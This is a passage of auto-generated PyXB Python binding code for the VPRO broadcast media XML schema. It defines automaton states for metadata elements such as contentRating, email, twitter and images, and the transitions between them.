symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'contentRating')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 306, 6))
st_26 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_26)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_25, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'email')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 307, 6))
st_27 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_27)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_26, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'website')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 308, 6))
st_28 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_28)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_27, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'twitter')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 309, 6))
st_29 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_29)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_28, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'teletext')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 310, 6))
st_30 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_30)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_29, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'prediction')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 311, 6))
st_31 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_31)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_30, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'locations')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 312, 6))
st_32 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_32)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_31, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'relation')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 313, 6))
st_33 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_33)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_32, False))
symbol = pyxb.binding.content.ElementUse(baseMediaType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'images')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 314, 6))
st_34 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_34)
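    # Transitions: for each state, the elements that may follow it.
    # UpdateInstruction(cc, True) bumps the occurrence counter on a
    # self-loop; UpdateInstruction(cc, False) closes that counter (its
    # minimum must be met) as the automaton moves past the particle. So from
    # st_0, another crid increments cc_0, while the required broadcaster
    # finalizes it.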
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
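    # broadcaster is required and unbounded, hence uncounted: it may repeat
    # freely or hand over to portal, exclusive, region, or the first title.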
    transitions.append(fac.Transition(st_1, []))
    transitions.append(fac.Transition(st_2, []))
    transitions.append(fac.Transition(st_3, []))
    transitions.append(fac.Transition(st_4, []))
    transitions.append(fac.Transition(st_5, []))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
    transitions.append(fac.Transition(st_5, []))
    transitions.append(fac.Transition(st_6, []))
    transitions.append(fac.Transition(st_7, []))
    transitions.append(fac.Transition(st_8, []))
    transitions.append(fac.Transition(st_9, []))
    transitions.append(fac.Transition(st_10, []))
    transitions.append(fac.Transition(st_11, []))
    transitions.append(fac.Transition(st_12, []))
    transitions.append(fac.Transition(st_13, []))
    transitions.append(fac.Transition(st_14, []))
    transitions.append(fac.Transition(st_15, []))
    transitions.append(fac.Transition(st_16, []))
    transitions.append(fac.Transition(st_17, []))
    transitions.append(fac.Transition(st_18, []))
    transitions.append(fac.Transition(st_19, []))
    transitions.append(fac.Transition(st_20, []))
    transitions.append(fac.Transition(st_21, []))
    transitions.append(fac.Transition(st_22, []))
    transitions.append(fac.Transition(st_23, []))
    transitions.append(fac.Transition(st_24, []))
    transitions.append(fac.Transition(st_25, []))
    transitions.append(fac.Transition(st_26, []))
    transitions.append(fac.Transition(st_27, []))
    transitions.append(fac.Transition(st_28, []))
    transitions.append(fac.Transition(st_29, []))
    transitions.append(fac.Transition(st_30, []))
    transitions.append(fac.Transition(st_31, []))
    transitions.append(fac.Transition(st_32, []))
    transitions.append(fac.Transition(st_33, []))
    transitions.append(fac.Transition(st_34, []))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_4, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_5, False) ]))
st_7._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_6, True) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_6, False) ]))
st_8._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_7, True) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_7, False) ]))
st_9._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_8, True) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_8, False) ]))
st_10._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_9, True) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_9, False) ]))
st_11._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_10, True) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_10, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_10, False) ]))
st_12._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_11, True) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_11, False) ]))
st_13._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_12, True) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_12, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_12, False) ]))
st_14._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_13, True) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_13, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_13, False) ]))
st_15._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_14, True) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_14, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_14, False) ]))
st_16._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_15, True) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_15, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_15, False) ]))
